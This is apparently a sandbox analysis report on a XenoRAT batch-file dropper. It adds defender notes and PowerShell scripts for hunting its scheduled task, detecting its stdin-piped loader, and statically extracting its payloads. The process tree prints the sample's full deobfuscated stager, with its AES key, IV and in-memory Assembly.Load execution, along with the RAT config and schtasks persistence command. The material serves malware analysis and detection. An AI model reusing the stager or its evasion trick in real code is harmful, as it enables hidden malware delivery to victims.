Analysis

max time kernel: 30s
max time network: 11s
platform: windows10-2004_x64
resource: win10v2004-20240611-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12-06-2024 22:23

Static task: static1
Behavioral task: behavioral1
Sample: sdsd.bat
Resource: win7-20240611-en

General

Target: sdsd.bat
Size: 399KB
MD5: dedc70c320233bc67ceb02a9492f29d6
SHA1: d031a05a302501a50581a2338762013f60da62df
SHA256: c1836c0d56c8ec60cee58783c67c900f170d854e60f856c1a5b9e001894c8e1a
SHA512: 776e753db2a34143981814c44fb0e8bdfa78b38d186ce9e794cd927f28408397460f302d63d731f4c6794cd745164211370b9db7b47b4884d01c5f76f066f93e
SSDEEP: 6144:QpmLNVyxXtQ5MtZl5HaSAcfGoPTT5rYwZVYVwmmkcPW0oLCol6w1w/apK0/X0DC:Qga9t8Mt/HA4T9be9mfu0oZ6ziD/EG
Malware Config

Extracted
Family: xenorat
C2 host: 127.0.0.1
delay: 5000
install_path: temp
port: 7788
startup_name: lol
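The extracted config gives a responder three host-observable values: the scheduled task name (startup_name "lol"), the install location (install_path "temp", which the process tree below shows resolving to %TEMP%\XenoManager\sdsd.exe, registered by a schtasks.exe launched from SysWOW64, so the client runs as a 32-bit process) and the C2 port. The hunt script below is an added example written for this page, not code from the sandbox or from the sample; the indicator values are taken from this report, while the function and parameter names and the output shape are my own choices. Note that this build's C2 host is 127.0.0.1, so the port check in step 4 is only meaningful against builds that carry a real host, and is weak evidence on its own in any case.

```powershell
# Added example, not part of the sandbox report. Indicator values (task name "lol",
# %TEMP%\XenoManager, port 7788) come from the extracted config and the process tree;
# function and parameter names are assumptions. Run elevated on the host under review.

function Get-TempDirTaskAction {
    # Any scheduled task whose action runs out of a user's AppData\Local\Temp is worth a
    # look regardless of its name; this sample registers one named after startup_name.
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $exe = [string]$action.Execute
            if ($exe -match '\\AppData\\Local\\Temp\\') {
                [pscustomobject]@{
                    TaskName  = $task.TaskName
                    TaskPath  = $task.TaskPath
                    Execute   = $exe
                    Arguments = [string]$action.Arguments
                    State     = [string]$task.State
                }
            }
        }
    }
}

function Find-XenoRatArtifact {
    param(
        [string]$StartupName = 'lol',          # config: startup_name
        [string]$InstallDir  = 'XenoManager',  # subfolder of %TEMP% seen in the process tree
        [int]$C2Port         = 7788            # config: port
    )
    $findings = New-Object System.Collections.Generic.List[object]

    # 1. Task definition the Schedule service writes when the task is registered.
    $taskFile = Join-Path $env:SystemRoot ('System32\Tasks\' + $StartupName)
    if (Test-Path -LiteralPath $taskFile) {
        $findings.Add([pscustomobject]@{ Type = 'TaskFile'; Detail = $taskFile })
    }

    # 2. The registered task itself and what it launches.
    $task = Get-ScheduledTask -TaskName $StartupName -ErrorAction SilentlyContinue
    if ($task) {
        foreach ($action in $task.Actions) {
            $findings.Add([pscustomobject]@{
                Type   = 'ScheduledTask'
                Detail = "$($task.TaskPath)$($task.TaskName) -> $($action.Execute) $($action.Arguments)"
            })
        }
    }

    # 3. The dropped client under every profile's temp directory (install_path "temp").
    $usersRoot = Join-Path $env:SystemDrive 'Users'
    foreach ($userDir in Get-ChildItem -Path $usersRoot -Directory -ErrorAction SilentlyContinue) {
        $dir = Join-Path $userDir.FullName "AppData\Local\Temp\$InstallDir"
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        foreach ($file in Get-ChildItem -LiteralPath $dir -File -ErrorAction SilentlyContinue) {
            $hash = (Get-FileHash -LiteralPath $file.FullName -Algorithm SHA256).Hash
            $findings.Add([pscustomobject]@{ Type = 'DroppedFile'; Detail = "$($file.FullName) sha256=$hash" })
        }
    }

    # 4. Live connections to the C2 port with the owning process. Weak on its own (any
    #    service may use 7788) and pointless for this build, whose C2 host is 127.0.0.1.
    foreach ($conn in Get-NetTCPConnection -RemotePort $C2Port -ErrorAction SilentlyContinue) {
        $proc = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
        $findings.Add([pscustomobject]@{
            Type   = 'Connection'
            Detail = "$($conn.LocalAddress):$($conn.LocalPort) -> $($conn.RemoteAddress):$($conn.RemotePort) pid=$($conn.OwningProcess) ($($proc.ProcessName))"
        })
    }

    return $findings
}

# Usage:
# Find-XenoRatArtifact | Format-Table -AutoSize
# Get-TempDirTaskAction | Format-Table -AutoSize
```

The task-name and install-folder checks are specific to this configuration; Get-TempDirTaskAction is the generic version, since the builder lets the operator pick both values and a different build will use different ones.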
Signatures

Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Run Powershell and hide display window.
pid 2032 powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Key value queried: \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation (sdsd.exe)

Executes dropped EXE (2 IoCs)
pid 1668 sdsd.exe
pid 4796 sdsd.exe

Drops file in System32 directory (1 IoC)
File opened for modification: C:\Windows\System32\Tasks\lol (svchost.exe)
The writer is the Task Scheduler service host (svchost.exe -k netsvcs -p -s Schedule, PID 1120 in the process tree) materialising the task definition that schtasks.exe (PID 404) registered on the client's behalf; none of the sample's own processes appear in this signature.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid 404 schtasks.exe

Modifies registry class (7 IoCs)
All seven entries are by svchost.exe PID 792 (the DcomLaunch host, a top-level process in the tree) under the ContentDeliveryManager app-model key, and are not part of the sample's process chain:
Key created: \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy
Key created: \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI
Key created: \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App
Key created: \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1
Key created: \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU
Set value (int): \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133627046440725541"
Set value (int): \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133627046519666538"

Suspicious behavior: EnumeratesProcesses (37 IoCs)
pid 2032 powershell.exe (37 events)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Token: SeDebugPrivilege, pid 2032 powershell.exe (1 event)
Token: SeShutdownPrivilege and SeCreatePagefilePrivilege, pid 3428 Explorer.EXE (2 events each)
Token: SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege (5 events each) and SeManageVolumePrivilege (4 events), pid 2580 svchost.exe (Winmgmt); the listing stops at 64 entries partway through the fifth cycle
Only the SeDebugPrivilege enablement in powershell.exe belongs to the sample's process chain; Explorer.EXE and the Winmgmt svchost are top-level system processes in the tree.

Suspicious use of WriteProcessMemory (63 IoCs)
source pid/process -> target pid (sandbox procid_target), count:
1048 cmd.exe -> 5040 (93) x2 (cmd.exe), 2032 (94) x2 (powershell.exe)
2032 powershell.exe -> one write each to 48 top-level system processes: 3428 (56), 1120 (19), 2556 (45), 968 (12), 4512 (67), 964 (15), 2300 (41), 1736 (31), 2320 (42), 1460 (24), 3300 (54), 1920 (36), 1520 (26), 1604 (27), 1908 (35), 916 (11), 1704 (30), 1304 (22), 1696 (38), 1096 (18), 4440 (69), 2068 (39), 3840 (75), 1076 (17), 1468 (25), 3036 (52), 1848 (34), 948 (82), 1644 (29), 1840 (33), 2428 (43), 408 (14), 60 (16), 3604 (57), 1828 (32), 1232 (21), 2608 (48), 1620 (28), 1220 (20), 792 (8), 4948 (68), 4372 (70), 2188 (71), 2580 (47), 2772 (50), 1392 (23), 2112 (40), 2564 (46)
2032 powershell.exe -> 1668 (96) x3 (sdsd.exe)
1668 sdsd.exe -> 4796 (97) x3 (XenoManager\sdsd.exe)
4796 sdsd.exe -> 404 (98) x3 (schtasks.exe)
792 svchost.exe -> 448 (101) x2 (wmiprvse.exe)
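The two cmd.exe children in the process tree below show how the script reached PowerShell: the batch file runs "echo <script> | powershell.exe -w hidden", so the decoder appears only on the command line of the helper cmd.exe (PID 5040) that cmd.exe spawns for the left-hand side of the pipe, while powershell.exe (PID 2032) starts with nothing but "-w hidden" and reads the script from standard input. A rule that keys on powershell.exe's own command line sees nothing. The detection below is an added example written for this page, not anything from the report; it runs over process-creation records (constructed here from the tree, with the PID 5040 command line truncated) and flags both halves of the pattern. Field names follow Sysmon Event ID 1 and are an assumption about your telemetry; the benign fourth record is constructed to show the stdin rule ignoring a hidden PowerShell that does name a script file.

```powershell
# Added example, not from the sandbox report. Input records are constructed from the
# process tree (command line of PID 5040 truncated); the Sysmon event 1 field names
# (Image, ParentImage, CommandLine, ProcessId) are assumed for the telemetry.

function Test-StdinPowerShellLoader {
    param([Parameter(Mandatory)][object[]]$Events)
    # Traits of the self-decrypting stager that show up on the echo side of the pipe.
    $loaderMarkers = @(
        '\[-1\.\.-\d+\]\s*-join',   # reversed string literal trick ('gnirtS46esaBmorF'[-1..-16] -join '')
        'TransformFinalBlock',      # AES decrypt
        'GZipStream',               # decompression
        'Reflection\.Assembly',     # in-memory assembly load
        '\.EntryPoint'              # invoking the loaded assembly
    )
    foreach ($e in $Events) {
        $img    = ([string]$e.Image       -replace '^.*[\\/]', '').ToLowerInvariant()
        $parent = ([string]$e.ParentImage -replace '^.*[\\/]', '').ToLowerInvariant()
        $cl     = [string]$e.CommandLine

        # Half 1: cmd.exe spawned by cmd.exe to run the left side of a pipe ('/S /D /c" echo ...').
        if ($img -eq 'cmd.exe' -and $parent -eq 'cmd.exe' -and $cl -match '/S\s+/D\s+/c"\s*echo\s') {
            $hits = @($loaderMarkers | Where-Object { $cl -match $_ })
            if ($hits.Count -ge 2) {
                [pscustomobject]@{ ProcessId = $e.ProcessId; Rule = 'echo-piped stager'; Evidence = ($hits -join ', ') }
            }
        }

        # Half 2: hidden powershell.exe under cmd.exe with no -Command/-File/-EncodedCommand
        # (any prefix form) and no script path: the only place a script can come from is stdin.
        if ($img -eq 'powershell.exe' -and $parent -eq 'cmd.exe' -and
            $cl -match '(^|\s)-w[a-z]*\s+hidden\b' -and
            $cl -notmatch '\s-(c[a-z]*|f[a-z]*|e|ec|en[a-z]*)\b' -and
            $cl -notmatch '\.ps1\b') {
            [pscustomobject]@{ ProcessId = $e.ProcessId; Rule = 'hidden powershell reading stdin'; Evidence = $cl }
        }
    }
}

# Constructed records modelled on the process tree (not real telemetry).
$sampleEvents = @(
    @{ ProcessId = 1048; Image = 'C:\Windows\system32\cmd.exe'; ParentImage = 'C:\Windows\Explorer.EXE'
       CommandLine = 'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sdsd.bat"' }
    @{ ProcessId = 5040; Image = 'C:\Windows\system32\cmd.exe'; ParentImage = 'C:\Windows\system32\cmd.exe'
       CommandLine = 'C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Key=[System.Convert]::(''gnirtS46esaBmorF''[-1..-16] -join '''')(''...''); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); ... $BISrT=[System.Reflection.Assembly]::(''daoL''[-1..-4] -join '''')([byte[]]$param_var); $DWUga=$BISrT.EntryPoint; ... "' }
    @{ ProcessId = 2032; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\system32\cmd.exe'
       CommandLine = '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden' }
    # Benign control (constructed): hidden, but the script is named on the command line.
    @{ ProcessId = 6100; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\system32\cmd.exe'
       CommandLine = 'powershell.exe -w hidden -ExecutionPolicy Bypass -File C:\ProgramData\maint\cleanup.ps1' }
)

Test-StdinPowerShellLoader -Events $sampleEvents | Format-Table -AutoSize
```

Against the constructed records the function reports PID 5040 under the first rule and PID 2032 under the second and leaves 1048 and 6100 alone. Either half on its own is a reasonable alert; both within the same parent cmd.exe is the pattern this sample shows. Independently of process telemetry, PowerShell script block logging (event 4104) records the script no matter how it was delivered, which is the control that makes the stdin trick irrelevant.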
Processes
(each indented entry is a child of the nearest less-indented entry above it; the original "N⤵" markers gave the same depth)

C:\Windows\system32\svchost.exe -k DcomLaunch -p  [PID 792]
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding  [PID 448]
C:\Windows\system32\svchost.exe -k RPCSS -p  [PID 916]
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM  [PID 968]
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  [PID 408]
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p  [PID 964]
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts  [PID 60]
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService  [PID 1076]
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc  [PID 1096]
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule  [PID 1120]
  - Drops file in System32 directory
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc  [PID 1220]
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc  [PID 1232]
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog  [PID 1304]
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager  [PID 1392]
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem  [PID 1460]
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes  [PID 1468]
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi  [PID 1520]
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS  [PID 1604]
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp  [PID 1620]
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder  [PID 1644]
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc  [PID 1704]
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  [PID 1736]
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository  [PID 1828]
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  [PID 1840]
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache  [PID 1848]
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection  [PID 1908]
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm  [PID 1920]
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc  [PID 1696]
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p  [PID 2068]
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation  [PID 2112]
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent  [PID 2300]
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT  [PID 2320]
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc  [PID 2428]
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks  [PID 2556]
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer  [PID 2564]
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt  [PID 2580]
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService  [PID 2608]
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc  [PID 2772]
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker  [PID 3036]
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc  [PID 3300]
C:\Windows\Explorer.EXE  [PID 3428]
  - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sdsd.bat"  [PID 1048]
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\cmd.exe /S /D /c" echo <script> "  [PID 5040]
          This helper is how cmd.exe runs the left-hand side of a pipeline ("echo <script> | powershell.exe -w hidden"): the sibling powershell.exe (PID 2032) receives the script on standard input and shows nothing but "-w hidden" on its own command line. The script, reflowed from the recorded command line without other changes:
          function decrypt_function($param_var){
            $aes_var=[System.Security.Cryptography.Aes]::Create();
            $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;
            $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
            $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uE03OF756EwHDsXZZ4dW1daMDjFkoEm1g+uRel3+taQ=');
            $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OQwUXKYXuHYJURyKYIwNjA==');
            $decryptor_var=$aes_var.CreateDecryptor();
            $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
            $decryptor_var.Dispose(); $aes_var.Dispose();
            $return_var;
          }
          function decompress_function($param_var){
            $okmXp=New-Object System.IO.MemoryStream(,$param_var);
            $xIYUl=New-Object System.IO.MemoryStream;
            $muRJA=New-Object System.IO.Compression.GZipStream($okmXp, [IO.Compression.CompressionMode]::Decompress);
            $muRJA.CopyTo($xIYUl);
            $muRJA.Dispose(); $okmXp.Dispose(); $xIYUl.Dispose();
            $xIYUl.ToArray();
          }
          function execute_function($param_var,$param2_var){
            $BISrT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);
            $DWUga=$BISrT.EntryPoint;
            $DWUga.Invoke($null, $param2_var);
          }
          $kcqDb = 'C:\Users\Admin\AppData\Local\Temp\sdsd.bat';
          $host.UI.RawUI.WindowTitle = $kcqDb;
          $qjwUw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kcqDb).Split([Environment]::NewLine);
          foreach ($BKyFZ in $qjwUw) {
            if ($BKyFZ.StartsWith('mfixKLpOscLidzGbRQVv')) { $QJzdJ=$BKyFZ.Substring(20); break; }
          }
          $payloads_var=[string[]]$QJzdJ.Split('\');
          $payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));
          $payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));
          execute_function $payload1_var $null;
          execute_function $payload2_var (,[string[]] (''));
          The reversed literals resolve to FromBase64String, Load and ReadAllText. The script reads sdsd.bat itself, takes the line beginning with the 20-character marker mfixKLpOscLidzGbRQVv, splits the remainder on '\' into two blobs, undoes the '#'->'/' and '@'->'A' substitutions, base64-decodes, AES-256-CBC-decrypts with the hard-coded 32-byte key and 16-byte IV, gunzips, and hands each result to Assembly.Load, invoking the entry point (the first with no arguments, the second with an empty string array). Nothing is written to disk by the stager; the first file drop is by whatever the loaded assemblies do.
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden  [PID 2032]
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
            "C:\Users\Admin\AppData\Local\Temp\sdsd.exe"  [PID 1668]
              - Checks computer location settings
              - Executes dropped EXE
              - Suspicious use of WriteProcessMemory
                "C:\Users\Admin\AppData\Local\Temp\XenoManager\sdsd.exe"  [PID 4796]
                  - Executes dropped EXE
                  - Suspicious use of WriteProcessMemory
                    "schtasks.exe" /Create /TN "lol" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9DE.tmp" /F  (image C:\Windows\SysWOW64\schtasks.exe)  [PID 404]
                      - Creates scheduled task(s)
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc  [PID 3604]
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager  [PID 4512]
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc  [PID 4948]
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV  [PID 4440]
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc  [PID 4372]
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc  [PID 2188]
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc  [PID 3840]
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo  [PID 948]
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3884,i,7977653611488681184,6839495125838449898,262144 --variations-seed-version --mojo-platform-channel-handle=4448 /prefetch:8  [PID 4764]
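The echo'd PowerShell in the tree above is a self-decrypting stager, and every step of it except the final Assembly.Load is deterministic from what the sandbox recorded: read the .bat, take the line after the marker, split on '\', undo the '#'/'@' substitutions, base64-decode, AES-256-CBC-decrypt with the hard-coded key and IV, gunzip. Running those steps and stopping before the load gives a static extractor for the two embedded assemblies. The following is an added example written for this page, not code from the report or from the sample; the marker, key, IV and substitution table are copied from the recorded command line, while the output directory, the function names and the summary object are my own choices. It writes payload1.bin and payload2.bin for follow-up (file type, hashes, config extraction) and never executes either.

```powershell
# Added example, not part of the sandbox report or the sample. Marker, key, IV and the
# '#'->'/' and '@'->'A' substitutions are copied from the recorded command line; the output
# directory and function names are my own. Nothing here calls Assembly.Load.

function ConvertFrom-StagerBase64 {
    param([Parameter(Mandatory)][string]$Encoded)
    # The stager stores base64 with '/' swapped for '#' and 'A' for '@'; reverse that first.
    $clean = $Encoded.Replace('#', '/').Replace('@', 'A')
    return ,([Convert]::FromBase64String($clean))
}

function Unprotect-StagerBlob {
    param(
        [Parameter(Mandatory)][byte[]]$Cipher,
        [Parameter(Mandatory)][string]$KeyBase64,
        [Parameter(Mandatory)][string]$IvBase64
    )
    # AES-CBC/PKCS7 with the hard-coded 32-byte key and 16-byte IV, then gzip, exactly as
    # decrypt_function and decompress_function do in the stager.
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key     = [Convert]::FromBase64String($KeyBase64)
        $aes.IV      = [Convert]::FromBase64String($IvBase64)
        $decryptor = $aes.CreateDecryptor()
        try     { $plain = $decryptor.TransformFinalBlock($Cipher, 0, $Cipher.Length) }
        finally { $decryptor.Dispose() }
    } finally { $aes.Dispose() }

    $inStream  = New-Object System.IO.MemoryStream -ArgumentList (,$plain)
    $outStream = New-Object System.IO.MemoryStream
    $gzip = New-Object System.IO.Compression.GZipStream -ArgumentList $inStream, ([System.IO.Compression.CompressionMode]::Decompress)
    try { $gzip.CopyTo($outStream) } finally { $gzip.Dispose(); $inStream.Dispose() }
    $bytes = $outStream.ToArray()
    $outStream.Dispose()
    return ,$bytes
}

function Export-StagerPayload {
    param(
        [Parameter(Mandatory)][string]$BatPath,
        [string]$OutDir    = (Join-Path $env:TEMP 'sdsd_payloads'),         # assumption
        [string]$Marker    = 'mfixKLpOscLidzGbRQVv',                         # from the stager
        [string]$KeyBase64 = 'uE03OF756EwHDsXZZ4dW1daMDjFkoEm1g+uRel3+taQ=',  # from the stager
        [string]$IvBase64  = 'OQwUXKYXuHYJURyKYIwNjA=='                      # from the stager
    )
    # Same lookup the stager performs: first line beginning with the marker, minus the marker.
    $payloadLine = $null
    foreach ($line in [System.IO.File]::ReadAllLines($BatPath)) {
        if ($line.StartsWith($Marker)) { $payloadLine = $line.Substring($Marker.Length); break }
    }
    if ($null -eq $payloadLine) { throw "Marker '$Marker' not found in $BatPath" }

    New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
    $index = 0
    # '\' is outside the substituted base64 alphabet, which is why the stager can use it as separator.
    foreach ($blob in $payloadLine.Split('\')) {
        $index++
        $bytes = Unprotect-StagerBlob -Cipher (ConvertFrom-StagerBase64 $blob) -KeyBase64 $KeyBase64 -IvBase64 $IvBase64
        $path  = Join-Path $OutDir ("payload{0}.bin" -f $index)
        [System.IO.File]::WriteAllBytes($path, $bytes)
        [pscustomobject]@{
            Index       = $index
            Bytes       = $bytes.Length
            LooksLikePE = ($bytes.Length -gt 1 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)   # "MZ"
            SHA256      = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
            Path        = $path
        }
    }
}

# Usage, on an isolated analysis VM:
# Export-StagerPayload -BatPath 'C:\samples\sdsd.bat' | Format-Table -AutoSize
```

If the marker is not found, the .bat is a different build; the marker, key and IV are per-build values and the parameters exist so the same extractor can be pointed at a sibling sample once those three strings have been read from its own echo'd script.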
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 226B
MD5: 916851e072fbabc4796d8916c5131092
SHA1: d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA256: 7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA512: 07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 45KB
MD5: 41146957ad1a37a26565c42ac174609a
SHA1: 622b3cd22edd11ba59ec438e14fe96d0c03d5026
SHA256: 320b867ae9cbb01c732fab179a66d1c63ea3498f6dae49e4d1cfcb5d5e0cb1fc
SHA512: d763fd0086ec0e6fbd0b2d73ed86ff6e08079fc3651e83e91c0ab198189d313db2b2ace8d72c55178d463647eeb8cafa1a511cbf2bc366959f3fea9be0b9079d

Filesize: 1KB
MD5: 9ec91e3fb824c95fd8118ef24669988a
SHA1: 5b6fe95c2a51b7ef0970c3b24844ece400e677ea
SHA256: 45d3489cde25df745a4f071d83d83fc6d9daddc03b3a680a5c3010e844ae38f5
SHA512: b898e3d16d77d672b7f5d2c32ff2a5fbc6f71d1be5ed12c2981cabd4ef90315b36512335a15d2c3cbe0bb24539b6ccd37ea1771521f9487f2d915c148fc02fc2